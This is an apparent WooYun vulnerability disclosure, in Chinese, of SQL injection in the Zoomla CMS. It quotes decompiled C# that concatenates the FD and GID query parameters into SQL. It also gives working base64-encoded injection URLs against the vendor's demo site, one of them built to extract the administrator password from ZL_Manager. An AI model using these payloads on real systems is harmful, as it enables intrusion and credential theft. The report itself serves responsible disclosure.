乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-09: 细节已通知厂商并且等待厂商处理中 2014-08-10: 厂商已经确认,细节仅向厂商公开 2014-08-13: 细节向第三方安全合作伙伴开放 2014-10-04: 细节向核心白帽子及相关领域专家公开 2014-10-14: 细节向普通白帽子公开 2014-10-24: 细节向实习白帽子公开 2014-11-07: 细节向公众公开
无需登录,完美的注射点!
0x1App_Web_rckpp0om.dllUser_file 类,Page_Load()事件就有问题 if ((base.Request["state"] != null) && (base.Request["state"] == "tr")) { string str4 = base.Request.QueryString["FD"]; this.FileUrl = this.FileJiema(str4); this.hid.Value = str4; this.file = this.bfile.SelectFile(string.Concat(new object[] { " FileName='", this.FileUrl, "' and userid=", this.ull.GetLogin().UserID }));//注入点 if (this.file.DownUrl == null) { base.Response.Write("0"); base.Response.End(); }看一下bfile.SelectFile(string)函数,拼接SQL语句public M_File SelectFile(string where){ if (where == "") { this.sql = "select * from ZL_File"; } else { this.sql = "select * from ZL_File where " + where; } M_File file = new M_File(); SqlDataReader reader = SqlHelper.ExecuteReader(CommandType.Text, this.sql); if (reader.Read()) { file.UserID = Convert.ToInt32(reader["UserID"]); file.State = Convert.ToInt32(reader["State"]); file.ExtractionCode = reader["ExtractionCode"].ToString(); file.DownUrl = reader["DownUrl"].ToString(); file.FileName = reader["FileName"].ToString(); file.FileMD5 = reader["FileMD5"].ToString(); } return file;}base.Request.QueryString["FD"]可控,最喜欢的注入点,base64的注入语句!
搜索一下调用user_file类的文件:url为http://demo.zoomla.cn/common/file.aspx?FD=xxx&state=tr
FD=JyBhbmQgQEB2ZXJzaW9uPjAgYW5kICcxJz0nMQ%3d%3d&state=trFD=JyBhbmQgKHNlbGVjdCB0b3AgMSBBZG1pblBhc3N3b3JkIGZyb20gWkxfTWFuYWdlcik%2bMCBhbmQgJzEnPScx&state=tr
理论上这个点还可以任意文件读取。0x2
App_Web_acbkzcqn.dll 中的Edit_Statistics类protected void Page_Load(object sender, EventArgs e){ this.GroupID = this.buser.GetLogin().GroupID; string groupName = this.bGll.GetByID(this.GroupID).GroupName; if (base.Request.QueryString["GID"] != null) { base.Request.QueryString["GID"].ToString(); M_Node nodeXML = this.bll.GetNodeXML(DataConverter.CLng(DataConverter.CLng(base.Request.QueryString["NodeID"]))); XmlDocument document = new XmlDocument(); try { document.Load(base.Server.MapPath("/Config/Payment.xml")); } catch (Exception) { function.WriteErrMsg("出现错误"); } XmlNode node2 = document.SelectSingleNode("UserGroups/" + function.GetChineseFirstChar(groupName) + "/Manner"); this.Articles = DataConverter.CLng(node2.Attributes["Articles"].Value); M_Bnum bnum = this.b_EditWord.SelectBnum(string.Concat(new object[] { " datediff(week,browsertime,getdate())=0 and uid=", this.buser.GetLogin().UserID, " and GID=", base.Request.QueryString["GID"], " order by acid desc" }));//注入点 this.BEcount = this.b_EditWord.BnumCount(""); this.NodeBecount = this.b_EditWord.BnumCount("count(distinct(gid))| and nodeid=" + base.Request.QueryString["NodeID"]);
GID注入,前面的NODEID带入正常访问的值即可。Edit/Statistics.aspx不测试了,官方修一下吧。
http://demo.zoomla.cn/common/file.aspx?FD=JyBhbmQgKHNlbGVjdCB0b3AgMSBBZG1pblBhc3N3b3JkIGZyb20gWkxfTWFuYWdlcik%2bMCBhbmQgJzEnPScx&state=trhttp://demo.zoomla.cn/common/file.aspx?FD=JyBhbmQgQEB2ZXJzaW9uPjAgYW5kICcxJz0nMQ%3d%3d&state=tr
危害等级:中
漏洞Rank:5
确认时间:2014-08-10 13:41
感谢
暂无